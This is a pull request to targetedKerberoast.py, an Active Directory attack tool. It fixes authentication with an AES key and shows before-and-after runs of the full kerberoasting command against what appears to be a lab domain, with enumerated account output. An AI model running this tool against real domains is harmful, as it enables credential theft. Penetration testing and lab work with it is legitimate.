### PR TITLE
Fix authentication with aes

### DIFF
--- a/targetedKerberoast.py
+++ b/targetedKerberoast.py
@@ -515,8 +515,12 @@ def main():
                 auth_nt_hash = "31d6cfe0d16ae931b73c59d7e0c089c0"
             if auth_lm_hash == "":
                 auth_lm_hash = "aad3b435b51404eeaad3b435b51404ee"
-                
-        ldap_server, ldap_session = init_ldap_session(dc_ip=args.dc_ip, use_kerberos=args.use_kerberos, use_ldaps=args.use_ldaps, domain=args.auth_domain, username=args.auth_username, password=args.auth_password, lmhash=auth_lm_hash, nthash=auth_nt_hash)
+        
+        use_kerb = args.use_kerberos
+        if args.auth_aes_key is not None:
+            use_kerb = True
+
+        ldap_server, ldap_session = init_ldap_session(dc_ip=args.dc_ip, use_kerberos=use_kerb, use_ldaps=args.use_ldaps, domain=args.auth_domain, username=args.auth_username, password=args.auth_password, lmhash=auth_lm_hash, nthash=auth_nt_hash)
         users = {}
         if args.request_user is not None:
             logger.info("Attacking user (%s)" % args.request_user)

--- a/targetedKerberoast.py
+++ b/targetedKerberoast.py
@@ -79,7 +79,7 @@ def ldap3_kerberos_login(connection, target, user, password, domain='', lmhash='
     from impacket.krb5.types import Principal, KerberosTime, Ticket
     import datetime
 
-    if TGT is not None or TGS is not None:
+    if TGT is not None or TGS is not None or aes_key is not None:
         useCache = False
 
     if useCache:
@@ -546,7 +546,7 @@ def main():
                     target = args.auth_domain
 
         TGT = TGS = None
-        if args.use_kerberos:
+        if args.use_kerberos and args.auth_aes_key is None:
             try:
                 ccache = CCache.loadFile(os.getenv('KRB5CCNAME'))
             except Exception as e:


### PR DESCRIPTION
Hello!

I faced an error while using aes key for authentication, and this fix worked for me. Please let me know if that fixes the issue for you as well.

Thanks!

Output before:
```
./targetedKerberoast.py -d essos.local -u daenerys.targaryen --aes-key cf091fbd07f729567ac448ba96c08b12fa67c1372f439ae093f67c6e2cf82378 -k -v -D essos.local --dc-ip 192.168.56.12 --no-abuse --dc-host MEEREEN
[*] Starting kerberoast attacks
[DEBUG] Using Kerberos Cache: None
[!] 'NoneType' object has no attribute 'getCredential'
Traceback (most recent call last):
  File "/opt/lwp-scripts/targetedKerberoast.py", line 519, in main
    ldap_server, ldap_session = init_ldap_session(dc_ip=args.dc_ip, use_kerberos=args.use_kerberos, use_ldaps=args.use_ldaps, domain=args.auth_domain, username=args.auth_username, password=args.auth_password, lmhash=auth_lm_hash, nthash=auth_nt_hash)
                                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/lwp-scripts/targetedKerberoast.py", line 249, in init_ldap_session
    return init_ldap_connection(target, None, use_kerberos, domain, username, password, lmhash, nthash)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/lwp-scripts/targetedKerberoast.py", line 222, in init_ldap_connection
    ldap3_kerberos_login(ldap_session, target, username, password, domain, lmhash, nthash, args.auth_aes_key, kdcHost=args.dc_ip)
  File "/opt/lwp-scripts/targetedKerberoast.py", line 99, in ldap3_kerberos_login
    creds = ccache.getCredential(principal)
            ^^^^^^^^^^^^^^^^^^^^
AttributeError: 'NoneType' object has no attribute 'getCredential'
```

Output after:
```
./targetedKerberoast.py -d essos.local -u daenerys.targaryen --aes-key cf091fbd07f729567ac448ba96c08b12fa67c1372f439ae093f67c6e2cf82378 -k -v -D essos.local --dc-ip 192.168.56.12 --no-abuse --dc-host MEEREEN   
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[DEBUG] {'Administrator': {'dn': 
['CN=Administrator,CN=Users,DC=essos,DC=local'], 'spns': []}, 'snaplabs': 
{'dn': ['CN=snaplabs,CN=Users,DC=essos,DC=local'], 'spns': []}, 
'SEVENKINGDOMS$': {'dn': ['CN=SEVENKINGDOMS$,CN=Users,DC=essos,DC=local'], 
'spns': []}, 'daenerys.targaryen': {'dn': 
['CN=daenerys.targaryen,CN=Users,DC=essos,DC=local'], 'spns': []}, 
'viserys.targaryen': {'dn': 
['CN=viserys.targaryen,CN=Users,DC=essos,DC=local'], 'spns': []}, 
'khal.drogo': {'dn': ['CN=khal.drogo,CN=Users,DC=essos,DC=local'], 'spns': 
[]}, 'jorah.mormont': {'dn': 
['CN=jorah.mormont,CN=Users,DC=essos,DC=local'], 'spns': []}, 'sql_svc': 
{'dn': ['CN=sql_svc,CN=Users,DC=essos,DC=local'], 'spns': []}}
```